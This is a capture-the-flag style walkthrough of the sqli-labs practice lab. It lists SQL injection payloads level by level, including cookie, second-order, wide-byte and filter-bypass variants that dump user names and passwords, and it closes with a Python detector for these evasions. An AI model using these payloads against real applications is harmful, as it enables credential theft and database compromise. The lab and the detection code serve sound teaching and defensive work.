SQL injection basic statements:
order by 4
Determine the number of columns.
union select 1,2,3
Determine which columns are echoed on the page.
union select 1,user(),database()
Show the logged-in database user and the current database name.
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3
List the tables in the database.
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3
List the columns of the chosen table.
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
Dump the username and password information.
Page-2 (Advanced Injections): Less-21 to Less-38
Less-21 -- cookie injection, character-based with ')
First, log in normally to reach the page below.
Second, capture the current page's request with Burp Suite.
Third, send it to the Repeater module, select the injection statement and press Ctrl+B to Base64-encode it.
Injection statement:
') union select 1,2,3#
After encoding: JykgdW5pb24gc2VsZWN0IDEsMiwzIyA=
Fourth, if the page displays normally, I believe you know what to do from here.
Less-22 -- cookie injection, character-based with double quotes
Injection statement:
uname=" union select 1,2,3# ;
Same steps as above.
Less-23 -- GET injection with comments filtered
Injection statement:
id=-1' union select 1,2,3 ='1
Less-24 -- second-order injection
Assume the user admin is known to exist but its password is not.
First click "New User click here?" and register a user named admin'-- .
Then log in as that user to change the password:
log in with the admin'-- account you just registered and modify the password.
Login succeeds, and both accounts now have the same password.
Less-25 -- single-quote injection with or and and filtered
Injection statement:
id=-1' union select 1,2,3--
Less-25a -- numeric injection with or and and filtered
Injection statement:
id=-1 union select 1,2,3--
Less-26 -- single-quote character injection with comments and whitespace filtered
Injection statement:
id=-1'aandnd(updatexml(1,'~aaaa',1))anandd'1'='1
Less-26a -- ') character blind injection with comments and spaces filtered
No error is echoed here, so it is blind; the payload is the same as Less-26 with one extra closing parenthesis.
Less-27 -- single-quote injection with union, select, comments and spaces filtered
Injection statement:
id=1'and(updatexml(1,'~aaaa',1))and'1'='1
Less-27a -- double-quote blind injection with union and select filtered
Change the single quotes to double quotes; otherwise as above.
Less-28 -- ') character injection with union and select filtered
Injection statement:
Entered after the URL in the address bar:
http://localhost/sqli-labs-master/Less-28/?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273
URL before encoding:
id=111') UnIon All Select ('1'),2,('3
Less-28a -- ') character blind injection with union, select and spaces filtered
Injection statement:
Entered after the URL in the address bar:
http://localhost/sqli-labs-master/Less-28a/?id=-1%27)%0AUnIon%0AAll%0ASelect%0A1,2,3%0A--%20-
URL before encoding:
id=-1') UnIon All Select 1,2,3 -- -
Less-29 index.php -- single-quote character injection
Injection statement:
id=-1' union select 1,2,3 -- -
Less-29 login.php -- single-quote injection, bypass via HTTP parameter pollution
Injection statement:
id=1&id=-1' union select 1,2,3 -- -
Less-30 index.php -- double-quote character injection
Injection statement:
id=-1" union select 1,2,3 -- -
Less-30 login.php -- double-quote injection, bypass via HTTP parameter pollution
Injection statement:
id=1&id=-1" union select 1,2,3 -- -
Less-31 -- ") character injection
Injection statement:
id=-1") union select 1,2,3 -- -
Less-31 login.php -- ") injection, bypass via HTTP parameter pollution
Injection statement:
id=1&id=-1") union select 1,2,3 -- -
Less-32 -- wide-byte injection
Injection statement:
id=-1%df' union select 1,2,3 -- -
Less-33 -- GET wide-byte injection
Injection statement, entered in the URL field:
id=-1%df%27%20union%20select%201,2,3%20--%20-
Less-34 -- POST wide-byte injection
Injection statement:
Dumb�' union select 1,2,3 --
Less-35 -- numeric injection
Injection statement:
id=-1 union select 1,2,3
Less-36 -- wide-byte injection
Injection statement:
id=-1�' union select 1,2,3 -- -
Less-37 -- POST wide-byte injection
Injection statement:
Dumb�' union select 1,2 --
Less-38 -- POST wide-byte injection
Injection statement:
id=-1�' union select 1,2,3 -- -
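Seen from the defensive side, the bypasses in this walkthrough (the Base64-wrapped cookie of Less-21, %0A in place of spaces in Less-28, double-written keywords such as aandnd in Less-26, the duplicated id parameter of the login.php variants, and the %df wide byte of Less-32 onwards) are exactly the layers a request-log scanner has to undo before it can match anything. The following Python is an added example, not part of the original write-up or of sqli-labs: the function names, the indicator labels and the sample inputs (constructed from the payloads above) are its own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

KEYWORDS = ("union", "select", "updatexml", "information_schema", "group_concat")
STRIPPED = ("and", "or", "union", "select")   # words the Less-25..28 filters delete once


def layers(value):
    """The value itself plus its base64 decoding when it is valid base64 (the Less-21 cookie)."""
    out = [value]
    try:
        out.append(base64.b64decode(value, validate=True).decode("latin-1"))
    except (binascii.Error, ValueError):
        pass
    return out


def indicators(text):
    """Indicator labels (this example's own names) found in one decoded value."""
    text = re.sub(r"\s+|/\*.*?\*/", " ", text).lower()   # %0A, tabs, /**/ -> one space
    found = []
    if re.search(r"[\x80-\xff]['\"]", text):              # %df' wide byte before a quote
        found.append("wide-byte-quote")
    if re.search(r"--|#", text):                            # comment terminators
        found.append("comment")
    if re.search(r"'\s*\w*\s*=\s*'", text):                # '1'='1 style tail
        found.append("tautology")
    found += [kw for kw in KEYWORDS if kw in text]
    # aandnd -> and: the keyword reappears after a strip-once filter has run
    found += [kw + "-doubled" for kw in STRIPPED if kw in text.replace(kw, "")]
    return found


def scan(query):
    """Scan a raw query string (or a cookie's name=value body) and return
    {parameter: sorted indicator labels}.  Values are decoded as latin-1 so %df stays one
    high byte; a repeated name (parameter pollution) is flagged on its later occurrences."""
    report, seen = {}, {}
    for name, value in parse_qsl(query, keep_blank_values=True, encoding="latin-1"):
        seen[name] = seen.get(name, 0) + 1
        hits = {h for text in layers(value) for h in indicators(text)}
        if seen[name] > 1:
            hits.add("duplicate-parameter")
        if hits:
            report[name] = report.get(name, set()) | hits
    return {name: sorted(hits) for name, hits in report.items()}
```

The matching is heuristic and only shows which evasion a request used; the durable fix for every lesson here is a parameterised query, which none of these encodings can reach.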